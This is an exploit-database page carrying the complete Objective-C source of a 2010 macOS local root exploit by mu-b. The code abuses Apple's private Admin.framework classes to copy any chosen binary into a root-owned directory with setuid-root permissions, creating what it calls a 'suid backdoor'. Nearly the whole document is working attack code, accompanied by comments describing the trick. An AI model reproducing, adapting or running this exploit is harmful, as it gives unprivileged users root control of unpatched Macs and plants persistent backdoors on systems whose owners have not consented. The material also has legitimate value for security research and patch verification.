Apple MAC OS X < 10.9/10 - Local Root Exploit



EKU-ID: 4775 CVE: OSVDB-ID:
Author: mu-b Published: 2015-04-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/* osx-irony-assist.m
 *
 * Copyright (c) 2010 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X < 10.9/10? local root exploit
 * by mu-b - June 2010
 *
 * - Tested on: Apple MACOS X <= 10.8.X
 *
 * $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $
 *
 * The most ironic backdoor perhaps in the history of backdoors.
 * Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
 * uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
 * in a directory,
 *
 * drwxr-xr-x  62 root       wheel      2108  9 Apr 16:23 db
 *
 * without being root, now how did you do that?
 *
 * Copy what you want, wherever you want it, with whatever permissions you
 * desire, hmmm, backdoor?
 *
 * This is now fixed, so I guess this is OK :-)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
 */
   
#include <stdio.h>
#include <stdlib.h>
   
#import <SecurityFoundation/SFAuthorization.h>
#import <Foundation/Foundation.h>
   
/* where you want to write it! */
#define BACKDOOR_BIN  "/var/db/.AccessibilityAPIEnabled"
   
int do_assistive_copy(const char *spath, const char *dpath)
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  id authenticatorInstance, *userUtilsInstance;
  Class authenticatorClass, userUtilsClass;
   
  (void) pool;
  NSBundle *adminBundle =
    [NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
   
  authenticatorClass = [adminBundle classNamed:@"Authenticator"];
  if (!authenticatorClass)
    {
      fprintf (stderr, "* failed locating the Authenticator Class\n");
      return (EXIT_FAILURE);
    }
   
  printf ("* Found Authenticator Class!\n");
  authenticatorInstance =
    [authenticatorClass performSelector:@selector(sharedAuthenticator)];
   
  userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
  if (!userUtilsClass)
    {
      fprintf (stderr, "* failed locating the UserUtilities Class\n");
      return (EXIT_FAILURE);
    }
   
  printf ("* found UserUtilities Class!\n");
  userUtilsInstance = (id *) [userUtilsClass alloc];
   
  SFAuthorization *authObj = [SFAuthorization authorization];
  OSStatus isAuthed = (OSStatus)
    [authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
                                withObject:authObj];
  printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);
   
  NSData *suidBin =
    [NSData dataWithContentsOfFile:[NSString stringWithCString:spath
                                             encoding:NSASCIIStringEncoding]];
  if (!suidBin)
    {
      fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
      return (EXIT_FAILURE);
    }
   
  NSDictionary *createFileWithContentsDict =
    [NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
                                forKey:(id)NSFilePosixPermissions];
  if (!createFileWithContentsDict)
    {
      fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
      return (EXIT_FAILURE);
    }
   
  CFStringRef writePath =
    CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
  [*userUtilsInstance createFileWithContents:suidBin path:writePath
                                  attributes:createFileWithContentsDict];
#pragma clang diagnostic pop
  printf ("* now execute suid backdoor at %s\n", dpath);
   
  /* send the "Distributed Object Message" to the defaultCenter,
   * is this really necessary? (not for ownage)
   */
  [[NSDistributedNotificationCenter defaultCenter]
    postNotificationName:@"com.apple.accessibility.api"
    object:@"system.preferences" userInfo:nil
    deliverImmediately:YES];
   
  return (EXIT_SUCCESS);
}
   
int main (int argc, const char * argv[])
{
   
  printf ("Apple MACOS X < 10.9/10? local root exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");
   
  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <source> [destination]\n", argv[0]);
      exit (EXIT_SUCCESS);
    }
   
  return (do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
}